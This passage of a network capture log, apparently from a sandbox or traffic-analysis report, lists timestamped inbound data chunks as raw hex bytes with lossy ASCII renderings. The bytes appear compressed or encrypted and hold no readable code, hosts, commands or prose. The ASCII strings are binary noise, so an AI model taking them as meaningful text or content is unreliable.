                                                                                                                                                2022-09-29 12:51:28 UTC5855INData Raw: 21 5a 77 9b 89 59 90 c4 fd 8f 90 5a 4a 3e 60 08 49 fc 90 43 5c a7 06 6f 35 3a c4 ab 46 08 b5 ca 52 ae 13 2e f6 9a 75 98 4e 68 be 80 5b 55 43 59 2e b2 4b d9 58 f0 2d db 42 ca c7 ba ac 7f 5c e7 15 d5 95 d8 d4 d5 d3 c4 e2 c1 3f 3d ac 94 38 83 cf ce f1 50 6b 41 98 cc 07 d1 87 4c e9 0a 01 8e 92 2a 4f 76 c6 80 3d ed 41 b1 87 18 43 8f b0 29 7f d6 81 20 fe e4 10 2b 2d be fa 94 c4 b1 74 e5 a7 a4 ce 41 1a 00 ac 55 b5 ee fb 23 12 ba e4 41 b3 64 7b b1 1b a3 26 78 29 83 05 94 15 5e d5 a2 70 26 2b 46 e0 22 c3 89 d0 04 ae 72 21 ec 03 0f f9 75 69 e0 1b 3c cf 32 65 8a e0 0a 25 0f 19 ff 85 a0 4f 07 0c 38 7d bd a6 5a 7e 5c 63 54 96 53 33 0b 52 a2 89 3a 41 15 5f 3c 18 ff 77 b8 30 1f cb 3f ab 8f 57 b6 a0 4a 08 fe 8c f6 31 62 20 c9 35 10 d0 f2 31 c2 12 24 e7 e2 a5 2e 33 00 49
                                                                                                                                                Data Ascii: !ZwYZJ>`IC\o5:FR.uNh[UCY.KX-B\?=8PkAL*Ov=AC) +-tAU#Ad{&x)^p&+F"r!ui<2e%O8}Z~\cTS3R:A_<w0?WJ1b 51$.3I
                                                                                                                                                2022-09-29 12:51:28 UTC5871INData Raw: 39 e7 26 9e 67 fd c7 16 32 08 f8 ad 11 9a a0 a7 15 a3 f7 5f 71 42 9d f8 15 50 c8 46 0b 50 d5 b3 5f b9 9c c0 3d da db b7 d8 37 03 56 6b a7 8a ec 87 43 d4 d1 5b 51 e4 c0 8a 39 e8 c3 8d 0f 3b c6 19 ff 87 fe aa ad bc 72 4f 15 f0 3c 01 cb f6 88 d5 75 66 26 46 e4 38 4c 4b 44 30 6b f1 7d ec 61 a0 8b ab 0c fc 42 12 da 11 fd ba 11 f5 bb b2 cc e4 34 6b 18 6a ce 2f 96 01 72 a6 43 da 1d 48 84 b8 a6 22 57 bd b0 9c 11 0e f8 c1 10 b0 3f 46 80 2a 0a ba 04 e4 98 e2 72 56 ac 9a f3 7a ee e2 8e ca b0 d9 f5 63 f9 1e ea a6 a6 e4 94 d8 63 9e 28 25 3f 11 ca 4f b2 15 b8 51 e5 ee 94 44 10 75 8f 79 97 78 72 cb 16 98 bc aa a9 0d 9f 8e 61 81 70 a7 d8 ee 3a 3c c2 cd cb 2b 99 e8 ff e9 4d 53 bb b3 28 45 d8 6f 24 4d d8 2b 87 f0 d8 79 e5 ad 32 4f ef 9a 19 0a f5 d5 9f 71 48 fd 78 36 e0 a5
                                                                                                                                                Data Ascii: 9&g2_qBPFP_=7VkC[Q9;rO<uf&F8LKD0k}aB4kj/rCH"W?F*rVzcc(%?OQDuyxrap:<+MS(Eo$M+y2OqHx6
                                                                                                                                                2022-09-29 12:51:28 UTC5887INData Raw: 36 1c 48 79 11 2f 1f 41 60 2c 72 3f 29 8f 61 f0 2e 17 c5 49 5c 70 50 b9 16 b4 bd 25 02 bc 98 17 9e a5 0c 60 98 fa 47 95 cf 54 6c 7b 28 24 a9 12 96 c0 4d 91 99 6c ab 63 6e dd cb d3 1f 3d e7 15 80 1b e1 49 90 07 e6 ff 24 d1 87 74 bb 2a 4a 51 d0 4c 93 33 ec a1 19 a9 2c e0 c7 20 df 96 72 e9 0c 50 95 c3 02 ed f9 e4 70 66 28 60 9b 54 b6 f5 ba 1f 5c 66 59 3c 12 28 2b a7 74 1d bd 8c d0 84 1c 1f d8 11 08 c9 b7 9a fd db 20 b6 bf 50 48 01 2d 64 fe fa 53 13 ba 84 53 d0 af 8e 31 a2 f6 3f eb 35 19 b8 64 22 82 de d7 15 9b 1c 99 6a 6f 64 62 fe e2 ff 40 fb 6a 68 43 12 f4 da 8c 96 86 09 82 26 6f a3 9f a7 1d 9d f3 33 b7 47 1e 68 a9 4c 6b b9 4d c1 50 f4 11 67 c8 0c 27 08 6b ec 25 4a 55 3f 77 1a 9d 57 02 be 25 16 74 95 89 3d d5 57 49 01 4c 1d d1 4f 13 b9 de 10 49 ef 10 4c cc
                                                                                                                                                Data Ascii: 6Hy/A`,r?)a.I\pP%`GTl{($Mlcn=I$t*JQL3, rPpf(`T\fY<(+t PH-dSS1?5d"jodb@jhC&o3GhLkMPg'k%JU?wW%t=WILOIL
                                                                                                                                                2022-09-29 12:51:28 UTC5903INData Raw: 83 ac ec 47 54 54 88 31 84 08 6a 4b b0 47 0a 94 80 0b d5 36 53 2a cb 57 2f 94 ce 7c 09 b8 58 0e a5 f4 3e 48 2f 5e 8f ed 58 7a 79 74 12 e5 c0 6f 1b 37 38 5d d9 27 8a 13 3d 74 95 09 0a 65 dc 7b 54 c1 76 4e e5 94 f1 c9 ee 29 a3 08 54 ce b2 96 c5 b2 58 85 9e 28 fc 3f 81 f0 8e 54 54 ee df 89 48 61 cb f6 2e 31 15 06 ce 89 2b ed 07 30 ff 64 c1 99 11 13 6d 54 2d ef 22 6a d8 dd 83 54 9d 16 cc 00 27 2a e7 c5 5f 3a 2a f2 31 e8 bf 6d 7f cc 5b db 63 ef ec 94 8b a6 94 4e 00 b8 19 de 58 41 83 ee fd 7f aa 4f b2 16 fb c8 68 af e6 0e 44 38 11 ac 70 d2 ce 4c 48 3c 22 e6 9e 08 4d a0 e2 ee 3a 87 fb b7 cf ce a1 3d 8b d6 75 21 53 a2 b6 4c 7d c0 b1 0b d2 d8 ba e8 92 47 48 6d a0 91 72 a1 ba 44 2a be 55 bb 15 04 99 1b 19 bd 7d c7 1b c6 72 41 06 43 36 c7 a3 c3 25 fd b3 19 f1 01 08
                                                                                                                                                Data Ascii: GTT1jKG6S*W/|X>H/^Xzyto78]'=te{TvN)TX(?TTHa.1+0dmT-"jT'*_:*1m[cNXAOhD8pLH<"M:=u!SL}GHmrD*U}rAC6%
                                                                                                                                                2022-09-29 12:51:28 UTC5907INData Raw: 15 13 43 7e 92 46 a0 18 72 fc 89 5c 41 f0 54 8d 9d 29 de 4c 25 ec 3c 5c d7 23 96 60 01 7a 5b 6f 6d d5 6d 14 85 91 55 38 23 1c 38 c0 a8 d4 b5 a0 0c 74 da 7d 86 fe 91 a2 52 e2 c4 18 48 fc b7 62 46 c4 c7 66 eb dd 47 a8 ab 83 63 bd f5 f0 61 a3 96 c2 bf 35 3b 45 8d b7 09 de e5 ea 2a 00 5c 64 0d ca 4f db 14 f1 c2 93 9f 1c 2c fc 08 7c d1 8a 04 25 02 63 ff d3 21 34 5b 6e d7 06 c5 1f 6e 3d 92 5b 8e 84 3d 79 5f 3f 39 f3 60 ac e9 b8 52 66 7e 1f b2 bd 2c 96 2e 9b 23 1f 3a 2d 59 2f 1f d0 72 ad d0 02 7c fe 44 3d bb e0 86 22 ca d6 62 5c 9a f3 f6 1d 35 1f d1 48 c9 0c cd 77 0f e6 7a 60 c1 f3 50 e1 6a 60 41 55 5d b4 16 8f 48 c5 f5 d5 6e 80 c0 07 56 78 88 fd 15 0a 41 aa 5a b0 fe 27 8e 26 e6 ba 6c cc 88 ab f5 f4 a5 33 41 7e 7a 9f 81 8c 93 d0 7c ca 1e 6c a8 9c 1f f9 d9 de 4b
                                                                                                                                                Data Ascii: C~Fr\AT)L%<\#`z[ommU8#8t}RHbFfGca5;E*\dO,|%c!4[nn=[=y_?9`Rf~,.#:-Y/r|D="b\5Hwz`Pj`AU]HnVxAZ'&l3A~z|lK
                                                                                                                                                2022-09-29 12:51:28 UTC5923INData Raw: a4 5f a5 8a f7 89 9b c4 9e a4 68 45 2d d1 41 dd 85 09 8c f1 8e 8a a8 81 95 41 ae e9 ba ef d8 aa c1 cb b6 59 5d 56 06 00 20 64 e1 db d3 f9 d4 db 1b 96 c7 f1 d8 54 65 93 f9 66 f3 f4 7c e1 ae 26 93 12 b5 f6 68 dd fa 6b b5 7e 51 91 86 24 0e d9 89 a4 87 5a 5e fe 22 52 e2 94 f6 2e d1 5c df 98 2d 5c 08 c4 be b9 00 05 ff 49 6c 83 b9 76 15 7a eb 14 04 7b cb 84 3d ec f5 92 b6 65 dc 96 58 f7 11 20 0e 5a f3 aa 0f 9e 86 55 f4 bd b3 e4 c5 d0 85 55 5f e8 44 b7 b4 2b 2e fd 46 be 9b 0e 34 34 46 15 3a 8a a0 a9 ce 25 3f 33 aa 82 99 8d 0f 42 a3 77 8e d8 2e 32 22 41 1b c7 07 33 ff aa 6f 58 87 2b 5f f9 fd e6 5b 7f 8c bc 42 b7 04 ce 77 86 15 ff ec 88 ac df 8f a6 96 9b 9f 6a 8e 6d 40 cf e0 39 36 99 ff cc ed 16 a6 dd b7 f4 30 b7 c9 ed cc de 39 73 16 a6 db 88 4c 2f eb 58 4e ab d8
                                                                                                                                                Data Ascii: _hE-AAY]V dTef|&hk~Q$Z^"R.\-\Ilvz{=eX ZUU_D+.F44F:%?3Bw.2"A3oX+_[Bwjm@9609sL/XN
                                                                                                                                                2022-09-29 12:51:28 UTC5939INData Raw: ff cb 3c 7c 47 4f 89 1c d1 73 49 53 e2 ec bc a3 f3 69 bb d9 e9 20 d1 05 44 3a a4 aa 33 69 72 d3 e1 ac d9 52 fa fb 3e 2c 3b d8 a0 5b 42 f8 fd 1c 77 7e d0 3c 52 c5 97 9b 87 db 2d c8 3f 07 07 0a 5a 87 5c ee 03 48 3e f0 b3 3e fc cd 68 f8 18 b8 0b e0 fc 3b 86 3b 45 b8 fe 8e 13 92 a6 1a 48 91 3d 62 75 25 d1 78 cc f3 66 07 1e 2f 50 52 00 c3 e8 c4 5c 9d 31 35 de e9 a9 76 6f 15 b0 39 e3 f6 09 c7 db c8 9e 21 b7 fa d1 9c 0e a6 3d 06 14 f2 84 03 55 40 bc 2f 99 8a f3 77 7d e0 5a b2 98 1f c3 87 a6 87 c6 46 e2 bc 70 06 cf 12 45 31 ae 6f 5e 63 a6 e3 ae 68 c0 22 00 2a b1 3a 7a d7 b4 13 84 e2 2c 28 c9 fd e1 bf ad 17 e5 e2 35 33 0b dd 66 28 6d d9 36 c6 f0 1a 37 3f 14 e1 03 7d 12 88 b4 05 6d 96 71 3e 99 b1 e5 c5 34 b3 b7 0a 60 b7 f3 e3 e4 f6 35 d4 82 df a7 8e 3d a5 0b 7e 2e
                                                                                                                                                Data Ascii: <|GOsISi D:3irR>,;[Bw~<R-?Z\H>>h;;EH=bu%xf/PR\15vo9!=U@/w}ZFpE1o^ch"*:z,(53f(m67?}mq>4`5=~.
                                                                                                                                                2022-09-29 12:51:28 UTC5955INData Raw: 44 4d 0d 5e 1a 89 8b d7 1a d0 ce 1e 43 5e 8b fc 44 80 cb 71 36 43 21 b0 a2 86 3d d6 8c 29 bd 98 a2 87 5e 45 be 27 80 25 b7 e8 b1 e6 7e ff 26 0c 74 ab 09 cc 86 91 2b 60 2d 6f 48 55 d4 da f4 f3 1b 2e c3 de a0 fb fa 12 f5 03 2d 40 8c ad 9e a8 5b 07 e4 ed e3 4c 49 ad 4e 12 f5 4b f3 61 a7 55 c6 85 3a 68 7a c5 e6 6f d9 e7 77 ab 54 a2 c3 26 ff 84 10 24 a6 a1 42 42 4c 3e 6d ac e7 a7 d5 3b a7 76 cd 35 da 7c b9 d7 76 c9 5c b8 b2 58 8e b4 95 7d 4d 04 46 ed f4 64 b2 d2 27 d4 f1 dd 2d 0f 79 cf 58 29 6f 25 ad d7 47 25 00 3b 86 f6 ed 0f b0 2f b9 10 36 15 82 37 f3 a0 d6 8f 50 fa 2d f8 83 7c 5b c0 e9 55 46 5b c6 f6 c6 8d f2 4a 6a 6b 43 c1 5a 3b 4b 8f eb 14 91 1d c5 f8 90 00 d9 51 53 f7 e7 7a ba 8d 83 99 8b e9 ff 76 ce be c0 3e 95 0b d8 c9 03 cf 3d bd 96 e2 42 e1 a8 c6 46
                                                                                                                                                Data Ascii: DM^C^Dq6C!=)^E'%~&t+`-oHU.-@[LINKaU:hzowT&$BBL>m;v5|v\X}MFd'-yX)o%G%;/67P-|[UF[JjkCZ;KQSzv>=BF
                                                                                                                                                2022-09-29 12:51:28 UTC5971INData Raw: f6 e6 15 39 68 03 bd 8a 9d 04 2c a2 b7 17 6c 29 99 55 3d 68 4a d0 ab 47 4d 2f d7 1c ea e7 db c1 2e 8a 80 d6 f4 f4 4a 19 90 6a 88 db a9 39 6a dd 7b ad 87 19 c2 9a bf 59 5b ba 71 32 ae 5d a3 a3 16 d6 c8 1e 9e 78 46 36 6d dd 2f 97 3f b3 e0 64 08 f7 a5 ba 73 b0 3f 9a 20 73 99 67 4f 3d fc 9b 6f dc fe 14 32 2f ea cf 3c 11 a2 11 2d 4e 49 5e f8 1c 62 71 85 74 35 2e f8 5d aa 4e 0e d8 80 0a 6b a9 75 7a 22 3f b5 a2 7c 48 ca ab 1f e5 20 76 c8 6f 05 ba ae 5b f4 46 d5 d0 60 c0 ad 22 e6 a5 74 cd ef 7d 9d 4f 60 09 6c e9 cc 44 23 cd 65 5e bd 30 22 a3 a1 a1 55 da 55 76 95 95 92 2e 08 1a bf e5 1b a2 eb 10 4b a1 88 8b 48 d9 cd 49 2e 48 df f3 a0 38 db 1d 67 f4 4b 13 ae a0 03 af 99 ca 21 73 52 4f 2c 4a bf 78 30 4b c2 f9 f2 46 b5 25 54 5e 16 1d 9a 4f 76 4b 13 35 76 a4 58 64 7a
                                                                                                                                                Data Ascii: 9h,l)U=hJGM/.Jj9j{Y[q2]xF6m/?ds? sgO=o2/<-NI^bqt5.]Nkuz"?|H vo[F`"t}O`lD#e^0"UUv.KHI.H8gK!sRO,Jx0KF%T^OvK5vXdz
                                                                                                                                                2022-09-29 12:51:28 UTC5987INData Raw: e2 46 08 bb fd bb 19 d8 0d 36 f0 99 08 1d 0e f6 61 51 e4 6e 59 fe e1 f6 47 e2 13 d8 fc f1 7d fb 45 24 a8 7e 44 74 75 de 8f 68 cb 0b cc 53 2e dc 93 19 af 07 56 c4 06 77 a0 b4 01 60 7a da ab bc eb f9 38 01 44 5c 8d 39 29 65 32 1b d0 da dc f0 33 1d 3d 9e 8d 13 1e d2 a5 d2 5d 09 08 92 3f 06 a5 fc d4 df 65 e9 19 ed 05 62 c5 65 c0 9a 80 80 1e 2c c9 64 76 7e 63 51 1d e4 61 a9 3a 1c fe 38 b7 40 ca 32 41 0f d2 c4 43 ac ff c8 51 3a 45 54 a6 8c ee c4 5f 47 33 c6 58 6c 44 67 b6 cf 51 ed 83 84 10 b8 2a 7f b8 bb 95 c9 56 59 4d 1d b2 ae 1c af 9f 8d c6 2a 24 de fb a2 0d 88 60 24 e0 8a 5f 51 2c df af 8a e2 2a 2f 80 97 e2 bc 1d 29 3a 0b 1d 0d 37 f0 b9 f1 31 8e 72 2f 10 c5 eb 31 5f b3 3a 92 b5 33 d0 ea 1d 48 91 5d ed 56 e8 16 44 56 52 60 23 21 a1 97 e6 2e dc 76 ad 18 09 e2
                                                                                                                                                Data Ascii: F6aQnYG}E$~DtuhS.Vw`z8D\9)e23=]?ebe,dv~cQa:8@2ACQ:ET_G3XlDgQ*VYM*$`$_Q,*/):71r/1_:3H]VDVR`#!.v
                                                                                                                                                2022-09-29 12:51:28 UTC6003INData Raw: 63 3e ea 7c 92 3c c3 d7 b4 0e a2 ac e5 b2 27 1b c1 c1 dd 18 f0 f8 07 e0 e3 36 7c 9e 03 d7 18 5e 97 df 41 ff 43 bc d0 5d ce 80 62 59 20 61 8b 83 74 59 b4 90 e3 88 25 2d 58 a1 0d d5 60 12 14 b1 75 79 85 7d 36 78 cc ef c9 29 16 ff ae 20 c5 a9 10 ed 7c e8 1e ef f9 10 a4 1d 9b 18 3a 42 91 a0 82 e4 d6 a2 c7 de c7 42 a0 7f 86 40 b4 80 37 2d 34 63 11 44 22 c5 5c 24 63 25 da 18 80 90 f8 6d 94 2f a5 d8 71 47 7a 58 a0 5e e1 a5 29 55 51 1f 29 58 93 85 e4 ee 4c f8 a0 3a 6d b9 83 7b ea 5c 3d c0 73 60 2a 36 c4 fd 93 7f 4c 6b 8e fd 79 96 c7 03 b9 14 3a 56 30 85 26 2a 56 e6 00 44 34 91 c9 14 64 2d a3 d7 70 2f 27 f8 17 fc 03 06 d5 ba d5 36 d7 ea 79 40 9c bd c3 15 cb 10 aa 2e fe 12 9d a4 eb cd e4 9c 56 1d 3b e1 aa 88 9e 29 08 74 e8 a4 dd e7 a6 d9 32 bc 90 16 1e 05 3b b9 8e
                                                                                                                                                Data Ascii: c>|<'6|^AC]bY atY%-X`uy}6x) |:BB@7-4cD"\$c%m/qGzX^)UQ)XL:m{\=s`*6Lky:V0&*VD4d-p/'6y@.V;)t2;
                                                                                                                                                2022-09-29 12:51:28 UTC6019INData Raw: c7 e1 1d ef d6 d2 3d 5c 74 77 2f 58 25 67 4c 77 fe cc 05 27 83 6a 5e 27 d5 c3 30 f8 62 8a 79 69 58 de dd 8c f8 39 c2 40 7c 0b 81 1c c2 d8 8b 05 92 91 7d 30 b3 20 6f 1b b7 b5 61 ce c7 9a 6e 3c 14 aa a0 cb 68 64 14 b1 19 bc cf eb 3b 00 1f 31 df 98 df be 6c c9 4e bc e1 81 05 60 f8 17 43 21 a7 3c 15 f8 9a 08 f3 df 79 8c 29 d9 19 a0 a7 73 e4 61 07 ca 77 17 6c 10 47 e7 fb 45 7a 07 8c cc 18 ca 31 12 bb fd 62 c6 7d 4f 20 1f 7c 4a f9 18 a7 88 ca d6 e9 8f 32 40 9b c5 95 cd 64 c0 43 a2 4a 9c 66 1e 30 1a 61 e0 55 2f c2 8b 91 68 fc 15 fb ea 34 f0 0b 33 ae 82 4d 79 28 e6 58 9e 2c 34 17 97 49 63 6e 31 4c 10 be ed 8f d2 c4 c8 06 3e 0d 59 0a e2 fb b2 35 7b d3 2e e2 cf 10 b1 a4 c7 46 bd a7 4e 6c e3 a5 b6 5d 78 95 a7 37 01 50 3c f7 0a ab d3 31 5c 16 fc 2b a6 33 0e 1c d6 3f
                                                                                                                                                Data Ascii: =\tw/X%gLw'j^'0byiX9@|}0 oan<hd;1lN`C!<y)sawlGEz1b}O |J2@dCJf0aU/h43My(X,4Icn1L>Y5{.FNl]x7P<1\+3?
                                                                                                                                                2022-09-29 12:51:28 UTC6035INData Raw: df 0a d0 09 26 49 4a 28 3c 1f 26 82 63 79 b0 ca 63 bc 58 0b 03 b3 ee 87 26 97 e7 60 ff 6d 5a 46 e5 c5 f2 07 22 e5 25 15 68 6d 08 61 68 97 9d 83 4b d0 2e b5 92 1c 38 d1 53 5f a8 05 45 7e 61 73 fd b1 ae fd 31 6f 0f 96 4a 07 df f2 a4 58 91 85 4a 6a 20 ca 50 04 ff d1 47 13 02 0f 94 7b 5d a6 df 21 2f 2c a9 0b 82 5e 61 fe f0 fe dc 1a c8 3f c7 cf 62 b1 6d e3 79 de 5a 79 bb 7e b9 03 0b 72 5a a0 ad 78 47 39 97 bc 59 4c fb d2 68 b6 16 ed b1 4e 60 e8 df 98 31 c1 91 69 ba 9d ee b5 77 51 06 e4 f6 bf 11 8e 49 7a 67 ea 1c 41 12 fb dd 8a b3 d5 66 b2 76 5c af 73 72 2a 0c b7 3c cd b9 44 6a 4f 8e 64 7e 2f 55 05 45 78 d7 32 13 4c c7 50 05 90 f7 89 03 c9 5e 20 06 50 3e 63 78 78 81 ab 19 6a f0 2e 3c 10 ac 5d af 4c e3 ef 2f cd 20 4b 9a c8 42 51 ce 31 77 e5 96 34 85 e4 93 4e 8b
                                                                                                                                                Data Ascii: &IJ(<&cycX&`mZF"%hmahK.8S_E~as1oJXJj PG{]!/,^a?bmyZy~rZxG9YLhN`1iwQIzgAfv\sr*<DjOd~/UEx2LP^ P>cxxj.<]L/ KBQ1w4N
                                                                                                                                                2022-09-29 12:51:28 UTC6051INData Raw: e0 64 dd 38 40 23 3f d6 20 a7 46 9a 99 ae 2c cc 45 cb 50 c7 5b 16 2e 5c 51 ce 71 32 c4 c5 b1 f4 0f 90 67 a6 91 10 30 8a 9f 10 ef fc 99 17 2e 86 c2 40 f3 47 f5 9c fd 79 32 47 48 91 09 e2 f4 1b 2c 5a 83 bb ab 6b b7 9d 07 23 b1 47 90 93 b5 09 89 fe 85 e0 fd 62 6d c5 7a 44 49 2b 49 b0 5a ff 46 67 9b d4 6a 52 37 9d 9e 94 d6 e0 83 d6 58 c4 e8 ca 31 35 2f 46 c4 e8 c5 70 17 45 ae 5e 18 f4 22 87 16 88 02 f5 51 07 e2 e3 5e c9 3a 52 5e 09 ab ab 30 26 a5 ff 6e db c8 4a 59 70 c9 4c 03 3c a5 14 4c d7 c7 19 9a de 33 4c c6 e6 42 71 db 52 a1 86 d5 b7 41 e4 86 f5 88 2c 47 dc 2c 9b 2f ef 00 3b 97 ca 2c 64 43 91 82 3e 99 3e 66 a9 c7 04 99 47 07 10 71 85 6e 09 52 e0 1f fb df 47 a8 98 70 02 0b 8f 5c 57 cc d1 10 f5 f8 c4 5c 70 be 14 37 58 8f 75 95 e9 40 70 ec 1a 84 ee c6 48 be
                                                                                                                                                Data Ascii: d8@#? F,EP[.\Qq2g0.@Gy2GH,Zk#GbmzDI+IZFgjR7X15/FpE^"Q^:R^0&nJYpL<L3LBqRA,G,/;,dC>>fGqnRGp\W\p7Xu@pH
                                                                                                                                                2022-09-29 12:51:28 UTC6067INData Raw: c8 f8 d6 85 1a 49 27 56 6f cb 5f 81 78 23 ab 6e a3 7e b1 5f 15 2e 84 28 5c 03 dc 13 60 40 0c 19 84 06 3a 9b d4 82 26 58 48 25 4f 74 e1 01 4b 4f 3d a5 57 b2 91 26 42 53 37 c1 5e c8 79 01 ad 01 a4 ef 70 cc 9f 50 9c a1 a2 2e a5 e8 57 0a 9e 56 b0 84 ba 80 52 f1 5f ce 51 d2 12 aa 96 b8 fc 2f 6d 23 11 e0 f3 3b 27 09 47 0a 0c ee aa cf 51 3a 24 f3 a5 08 03 b7 37 20 58 00 b7 24 df 44 73 33 ec f9 34 81 08 d7 66 24 f4 46 41 55 8a 77 d1 af 7b 8d 82 33 1b 63 76 97 24 9f 30 49 5c eb 4d 15 01 a2 8b 9f cb 99 08 7c 39 d8 29 0b 77 82 66 e9 6d 7c 6f cb 4d 4c 43 31 57 3d a1 18 67 73 b2 d1 0e 1a 2f cd 66 c7 1e 19 b4 a2 7c 42 21 3d 18 52 b6 0d f2 47 c6 66 34 57 cc 3e a5 cc 63 d3 de 03 1e f8 bc a7 78 6d 89 a8 0f a4 68 14 bf e4 19 51 f3 dd b3 22 77 f7 5b 54 0a 79 8f db 16 34 dd
                                                                                                                                                Data Ascii: I'Vo_x#n~_.(\`@:&XH%OtKO=W&BS7^ypP.WVR_Q/m#;'GQ:$7 X$Ds34f$FAUw{3cv$0I\M|9)wfm|oMLC1W=gs/f|B!=RGf4W>cxmhQ"w[Ty4
                                                                                                                                                2022-09-29 12:51:28 UTC6083INData Raw: 77 c2 44 f6 4a f7 98 2e 9d 0d f6 4c 2c 18 fd 7d 09 3d ec 65 ee b5 44 d6 f3 6b 89 b0 fb 58 4e ec ca 2c 42 e9 40 e9 61 cd ca d5 5c b2 6e 4c 79 c2 19 d5 d9 aa c4 70 74 e2 c7 84 bc 34 f7 ca 7e d9 bb c4 82 3c fd ff a7 bc 7a 7c b0 84 ba 9f be 60 9e 37 10 79 87 ee 68 b7 91 8b 2a 39 d8 fa b9 a2 9e bb 96 b4 80 7f 8a 2c e2 aa 7f 14 89 f6 7d 43 d2 51 89 c5 b5 d1 91 c0 49 56 bd fe 0f d3 53 bb 5c e2 7a 17 86 1e 97 f7 e6 7d 22 68 32 34 5d e4 fa 9f ce 90 13 15 2a ef c0 e8 c9 09 3f 78 68 3e ad b0 6d 53 f1 ad 15 65 d4 60 49 c3 77 8f fb 52 76 c3 57 d6 27 90 c3 68 78 6f 50 fd be 7b 07 43 24 94 a7 a6 49 7f 93 89 80 5a 4d 9e 8d 38 ac f9 29 26 47 15 cc dd 1f d7 0a 45 9a 29 05 cd 1a 5f a6 d4 09 31 48 ca d0 e4 c8 ab 28 b3 62 f1 78 60 9c 36 4d fe c4 64 d2 8a db 9f 91 1e 06 da ec
                                                                                                                                                Data Ascii: wDJ.L,}=eDkXN,B@a\nLypt4~<z|`7yh*9,}CQIVS\z}"h24]*?xh>mSe`IwRvW'hxoP{C$IZM8)&GE)_1H(bx`6Md
                                                                                                                                                2022-09-29 12:51:28 UTC6099INData Raw: 12 21 08 63 ea 6a 0a 49 f2 42 35 3b 90 95 e9 3f aa 4e 21 cb 08 a3 10 cb b3 86 c0 0d 4a 2f f9 50 9e 2b cd 11 62 7d 67 89 37 a8 76 cd 01 5d ab 09 17 6e cf 75 a3 81 6f 7c cc 7d 6d d9 8a 26 b9 3a 8c 74 5e 83 70 b7 79 b2 18 2b ef 98 ce 23 f0 ea 82 c8 9f 59 f3 9a 6a 3f fd 08 11 f4 db 17 99 f8 22 14 a2 f5 f0 99 56 49 3b 8d f5 7a f3 4e b5 83 12 09 d4 a8 9a 28 9e a9 ad a5 35 0d 5a 2f dc ad 88 22 8a 7f 6a 57 c1 c3 9c 0c 25 dd b5 48 8e f4 ad 62 23 73 71 2f db 0e 2d 9a fc 2d 0c 21 b6 2b f8 e2 97 c5 6b 10 90 db 0f 06 39 0a 6b b4 bb c4 50 fe 6e 49 5c 13 e4 dc c6 a3 70 55 cc 23 08 1e 22 b4 d8 9d 6e 70 c5 7f 40 29 52 cb b6 5b 12 0f 9d e3 4d 4a 72 36 60 0d 20 e4 a2 73 3e b2 1d 70 69 7f 59 47 9f b6 1a 2b a4 a0 54 b0 b1 39 93 8b a2 0a c8 0a 36 84 71 d3 c8 34 8b 0e 23 59 3e
                                                                                                                                                Data Ascii: !cjIB5;?N!J/P+b}g7v]nuo|}m&:t^py+#Yj?"VI;zN(5Z/"jW%Hb#sq/--!+k9kPnI\pU#"np@)R[MJr6` s>piYG+T96q4#Y>
                                                                                                                                                2022-09-29 12:51:28 UTC6115INData Raw: 18 d1 27 b6 6d 75 16 7d bc 2f ca 7c f0 36 c9 df 8e fe b5 6e 14 4d ba 48 5b be 54 30 91 c7 34 24 7e 5d e8 42 e9 fd 51 c1 b9 b8 74 f3 26 f8 e0 7f d5 75 cd 00 4c 38 c7 fb 20 18 a9 36 50 d1 bb 59 19 af c9 0a f4 29 a4 90 4f c0 33 01 e7 d9 cf 08 a4 d1 3e 74 33 ef a7 28 bd 3b e7 a4 dc eb 84 eb c5 56 17 9e c6 78 0b ae 02 32 c0 be 4a 51 00 59 72 d5 88 b8 fb f5 2f b8 87 36 a6 58 e3 c2 a7 1f 9a 15 63 3c 0d 38 53 84 11 46 10 b8 fc 47 f8 8e b4 be 71 24 bb ec 6e 65 d8 e6 62 a3 3e 5c 59 83 9f a3 4a 71 0a 61 04 e0 21 a6 26 e2 7f 56 28 ab 5b d8 b8 fb 0b 84 2c 65 1d a5 fd 1c 8b 60 50 63 6f 47 b2 ea d4 e3 75 54 fc df 34 09 ba 4d 2a e8 70 e1 83 41 41 94 0c 8f b7 b7 64 3c 3d a2 c0 b5 91 4d 20 a3 98 39 81 bb bb 25 ed e0 52 da a4 2b 55 a5 84 49 72 f9 1b 6a 32 93 4c 75 43 d7 50
                                                                                                                                                Data Ascii: 'mu}/|6nMH[T04$~]BQt&uL8 6PY)O3>t3(;Vx2JQYr/6Xc<8SFGq$neb>\YJqa!&V([,e`PcoGuT4M*pAAd<=M 9%R+UIrj2LuCP
                                                                                                                                                2022-09-29 12:51:28 UTC6131INData Raw: 57 e1 4d 30 28 8b 31 76 d8 b9 ac 43 00 bf e4 1d ac 28 55 9a 21 29 fe 98 5f ed 82 b8 c7 75 1c 4a dc d7 f9 5f 7b b8 7a be 26 bf c6 17 ec bf 5e 32 93 81 12 ec 18 65 d4 c0 a8 c4 f5 26 fe 2f a8 60 37 2e d3 0b 66 9a 83 ec bb fb a6 4e be b2 39 fd 6d 4d fb 5a eb 05 f6 4c 94 18 54 e5 96 97 1d 9b fd 13 41 13 e7 1a b8 08 8b 08 56 0f 78 64 19 d4 c3 17 d6 15 0e 5d 05 a0 06 83 6d f8 8b ff 95 14 b4 a1 30 12 b1 4b b2 2d 7e 9e 8c d5 4a d5 95 37 22 c8 29 58 9c 81 d4 69 57 44 5c a1 f6 f4 0c 9b b6 41 57 18 0b d1 4b ba 41 38 c9 30 b7 f2 b2 2f 55 19 d1 91 ad 6b ab b0 e1 f2 11 00 fd b3 61 d1 b0 4b 5c 6b 30 7f 48 e3 20 32 70 7e 4f 93 8c f1 21 e1 fd 41 03 23 30 62 62 ff 61 69 a3 73 55 58 62 46 4a 60 40 9a da b7 7f be 06 ef 4e 28 1b 5a 21 aa 99 64 a9 c2 ba bd 0e 1e a2 25 1a b7 21
                                                                                                                                                Data Ascii: WM0(1vC(U!)_uJ_{z&^2e&/`7.fN9mMZLTAVxd]m0K-~J7")XiWD\AWKA80/UkaK\k0H 2p~O!A#0bbaisUXbFJ`@N(Z!d%!
